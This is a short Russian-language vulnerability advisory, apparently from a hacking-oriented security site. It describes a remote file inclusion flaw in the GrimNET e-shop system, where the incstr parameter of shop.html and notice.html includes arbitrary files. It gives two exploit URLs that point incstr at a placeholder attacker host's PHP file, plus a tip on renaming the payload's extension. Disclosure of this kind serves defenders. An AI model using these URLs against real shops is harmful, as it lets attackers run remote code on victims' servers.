Программа: GrimNET e-shop
Недавно была обнаружена уязвимость в корейской системе электронных магазинов
GrimNET e-shop. Сценарии shop.html и notice.html включают (include) любой файл, указанный в
переменной incstr без какой бы то ни было проверки ее содержимого.
Пример/эксплоит:
http://[victim]/shop.html?incstr= http://[hacker]/myfile.php
http://[victim]/notice.html?incstr= http://[hacker]/myfile.php
Примечание: если на хосте http://[hacker]/ установлен php, то сценарию (в нашем случае
myfile.php) надо дать иное расширение, например
myfile.inc.
Обнаружил уязвимость: NivaX (nivax@web-hack.ru),
www.web-hack.ru.
